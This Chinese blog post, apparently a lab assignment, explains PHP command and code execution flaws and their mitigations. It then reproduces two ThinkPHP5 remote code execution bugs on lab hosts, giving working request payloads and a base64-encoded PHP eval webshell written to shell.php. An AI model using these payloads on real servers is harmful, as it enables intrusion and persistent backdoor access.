代码执行漏洞和命令执行漏洞——http://159.75.16.25:8089 复现ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8

最新推荐文章于 2024-05-10 20:58:45 发布
最新推荐文章于 2024-05-10 20:58:45 发布
阅读量958 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52341820/article/details/124177197
版权

漏洞执行命令的原理:

两个条件:

  1. 用户能够函数的输入
  2. 存在可以执行代码的危险函数。

如何预防命令执行漏洞:

PHP内置的两个函数可以有效防止命令执行:

 1. escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。对于用户输入的部分参数就应该使用这个函数。资料参考:http://cn.php.net/manual/zh/function.escapeshellarg.php

 2.  escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数,或者 执行操作符 之前进行转义。资料参考:http://cn.php.net/manual/zh/function.escapeshellcmd.php

 3. php中禁止disable_functions(禁用一些危险函数)

 4. 参数值尽量使用引用号包裹,并在拼接前调用addslashes进行转义

当然,修复方法还有很多方式,修复方式一般有两种思维:

  1、黑名单:过滤特殊字符或替换字符  2、白名单:只允许特殊输入的类型/长度

代码执行漏洞和命令执行漏洞的区别:

命令执行漏洞:将用户的输入拼接到命令中去,又对用户的输入没有过滤(原因,以及xss sql),调用一些函数直营系统命令。

代码执行漏洞:在web应用中,为了考虑代码的灵活性和简洁性会调用一些危险的函数去处理(eg:eval函数),将一些字符串当成php代码去执行,没有考虑用户是否能控制这些代码,造成了代码执行的危害。

 

http://159.75.16.25:8089       复现ThinkPHP5 5.0.23远程代码执行漏洞

      http://159.75.16.25:8087      复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞

复现漏洞要求:

(1)操作步骤配截图。

(2) 要求复现时进行挂马操作,小马大马都可,需要有webshell管理工具截图。

并简述如何修复这两个版本的漏洞?言之有理即可

http://159.75.16.25:8089       复现ThinkPHP5 5.0.23远程代码执行漏洞

http://159.75.16.25:8089       复现ThinkPHP5 5.0.23远程代码执行漏洞

  • 打开该网站:

  • 访问该网页的index页面:

执行whoami,访问url :http://159.75.16.25:8089/index.php?s=captcha?s=captcha

_method=__construct&filter[]=system&method=get&get[]=whoami

  • 使用php语言:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd查看当前目录:得到/var/www/public

  • 构造php文本:

  • 发送post请求到页面,之后访问shell.php

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n bHh5PD9waHAgZXZhbChAJF9QT1NUWydyb290J10pOyA/Pmx4eQ== | base64 -d > shell.php

  • 访问shell.php ,出现lxylxy

  • 使用蚁剑进行连接:

  • 挂马复现成功。

http://159.75.16.25:8087      复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞

  • 打开该网址:

  • 执行whoami:将whoami的代码跟在url后面。

http://159.75.16.25:8087/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

  • 将想要嵌入的代码通过base64编码后紧跟在url后面。

  • 使用蚁剑进行连接。

  • 查看目录:

如何修复:

ThinkPHP 5.0< 5.0.22修复方法:在think\APP类的module方法的获取控制起的代码在后面加上

安全大牛(未来版)
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
简单讲解如何绕过PHP disable_function
h0ld1rs的博客
11-01 4319
前言 在渗透测试中,有时遇到拿到webshell后无法执行命令的情况,为了成功提权,需要我们绕过disable_function disable_function简介 disable_functions是php.ini中的一个设置选项,可以用来设置PHP环境禁止使用某些函数,通常是网站管理员为了安全起见,用来禁用某些危险的命令执行函数等。(eval并非PHP函数,放在disable_functions中是无法禁用的,若要禁用需要用到PHP的扩展Suhosin。) 绕过方法 1. 寻找未禁用的函数 黑名单
PHP disable_function绕过
goddemon
09-11 474
disable_functions 典型禁用函数 绕过的几个思路 最基础的两个绕法 ①寻找没有被禁用的函数 PHP 中执行命令的函数有-->因此找没有禁用掉的就好了 system,shell_exec,passthru,exec,popen,proc_open,pcntl_exec,mail,putenv,apache_setenv,mb_send_mail,assert,dl,set_time_limit,ignore_user_abort,symlink,link,map_open,imap_m
2024年ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6,2024年最新网络安全面试数据结构算法
最新发布
2401_84301389的博客
05-10 1029
服务框架是指某领域一类服务的可复用设计与不完整的实现,与软件框架不同的是,服务框架同时体现着面向服务,一个服务框架可以分为两个主要部分:服务引擎、引入的外部服务。ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,框架的安全稳定运行也直接决定着业务系统能否正常使用。
ThinkPHP漏洞大全
FY10033的博客
05-04 1万+
tp5payload大全 https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection tp5参考文献 https://blog.csdn.net/weixin_40709439/article/details/86564457 tp版本发现 1.使用错误的路径 2.采用错误的参数 1.版本5.0.x<5.0.23 1.0 5.0.x-5.0.23通杀RCE-payload # 第一个 http://127.0.0.1/cms/thi
Thinkphp漏洞详解合集
Aiwin的博客
05-24 2938
Thinkphp漏洞合集详细分析(未完成)
今晚拿下PHP反序列化的一系列操作
kali_Ma的博客
07-29 436
引言 在CTF中反序列化类型的题目还是比较常见的,之前有学习过简单的反序列化,以及简单pop链的构造。这次学习内容为php内置的原生类的反序列化以及一点进阶知识。 在题目给的的代码中找不到可利用的类时,这个时候考虑使用php中的一些原生类有些类不一定能够进行反序列化,php中使用了zend_class_unserialize_deny来禁止一些类的反序列化。 基础知识 原生类常见的用法是用来进行XSS、SSRF、反序列化、或者XXE,今天就来好好总结一下。 在CTF中常使用到的原生类有这几类 1、Error
用于产生太赫超宽边带光谱的新型电/光调制器
02-12
电光晶体LiTaO3的极性分布周期反转之后,在16.25 GHz的调制频率下,实现了微波与光波的准速度匹配,可以不局限于调制频率的高低,从而在增加相互作用长度的前提下充分提高调制效率,调制度已达到57 rad,产生的宽边...
pl/sql操作手册
10-24
7.1 输入 SQL 语句和命令............................................46 7.2 开发命令文件..................................................47 7.3 支持命令....................................................
国防军工行业:板块年报业绩稳步增长,行业景气度持续提升-0507-中信建投-29页.pdf
07-24
* 截至 5 月 5 日,军工板块 164 家上市公司已经全部发布 2018 年年度报告,剔除 16 家大幅首亏或大幅扭亏的公司后,148 家上市公司共实现营业收入 6068.46 亿元,同比增长 13.98%,实现归母净利润 292.12 亿元,同...
基于IEEE802.11a的OFDM+16QAM通信系统matlab性能仿真,含仿真操作录像
04-10
可以设置不同的SNR输出对应的星座图和误码率。 %工作频率:fc=5.2GHz %比特率:24Mbps %数据子载波数:Nsd=48 %导频子载波数量:Nsp=4 %副载波总数:Nst=52 %副载波频率间隔:fs=0.3125MHz(=20MHz/64) %总带宽:ft...
ThinkPHP漏洞总结(利用)
yangbz123的博客
04-26 1万+
ThinkPHP介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。 ...
Thinkphp常见漏洞利用
未完成的歌~的博客
04-14 3763
ThinkPHP是一个开源,快速、简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP。使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。
ThinkPHP框架漏洞总结
weixin_42345596的博客
08-25 3790
Thinkphp简介 ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。 ThinkPHP可以支持windows/U
渗透测试之路:ThinkPHP漏洞复现
m0_68353775的博客
01-10 2302
其实ThinkPH框架漏洞大多用到的都是设置对于控制器名的一个疏忽问题,不理解的小伙伴可以查来url调用文件的机制来学习一下,其实这些框架漏洞都是基于基础漏洞的一些拓展,至于sql漏洞,了解一下pdo预编译原理即可。不管java或是php在进行数据库查询的时候都应该进行pdo预编译,我们都知道,在jdbc工作的时候分成好多步1.建立连接2.写入sql语句3.预编译sql语句4.设置参数5.执行sql获取结果6.遍历结果(处理结果)7.关闭连接。
php5漏洞汇总,ThinkPHP 5.x RCE 漏洞分析与利用总结
weixin_34931142的博客
03-19 1232
一、ThinkPHP 5.0.23 rce漏洞复现与总结漏洞复现thinkphp 5.0.23 rcethinkphp 5.0.23 rce源码下载:github:https://github.com/top-think/framework/tree/v5.0.23影响版本ThinkPHP 5.0系列 < 5.0.23ThinkPHP 5.1系列 < 5.1.31安全版本ThinkPH...
ThinkPHP漏洞总结复现
1ance's blog
09-04 1148
ThinkPHP漏洞总结简介版本Thinkphp 2.x 任意代码执行漏洞漏洞原理复现过程修复意见Thinkphp5-5.0.22/5.1.29远程执行代码漏洞漏洞原理影响范围复现过程修复意见Thinkphp5.0.23远程代码执行漏洞漏洞原理影响范围复现过程修复意见Thinkphp5 SQL注入漏洞和敏感信息泄露漏洞漏洞原理影响范围复现过程修复意见 简介   ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名
[bhpyg] Thinkphp5 XSS攻击防御
u011436748的博客
01-14 752
1、什么是XSS攻击 跨站脚本攻击(Cross Site Scripting),攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 模拟过程: 添加功能中,请求参数值包含script标签js代码 添加成功之后,数据表中: [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-aaWwUc0I-1610609856714)(file:///C:\Users\asus\AppData\Local\T
tp5设置参数全局过滤
LordForce的博客
04-02 1262
thinkPHP5设置参数全局过滤
ThinkPHP5.0.*版本代码执行漏洞
热门推荐
锋刃科技的博客
01-12 3万+
我们先看处理请求的Request类,在thinkphp/ library/think/Request.php。 Method方法来获取当前的请求类型。 isGet、isPOST、isPUT等方法都调用了method方法来做请求类型的判断。 而在默认情况下,是有表单伪装变量的 在默认情况下,该变量值为_method 在Method方法中,将表单伪装变量对该方法的变量进行...
WebSocket connection to 'ws://192.168.16.25:8888/websocket' failed: Error during WebSocket handshake: Unexpected response code: 403
06-10
你可以通过检查服务器端的日志或代码来确定 WebSocket 是否已正确启用。 2. 检查服务器端的防火墙设置。有些防火墙可能会阻止 WebSocket 连接。你需要在服务器端的防火墙上打开 8888 端口(或你正在使用的 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值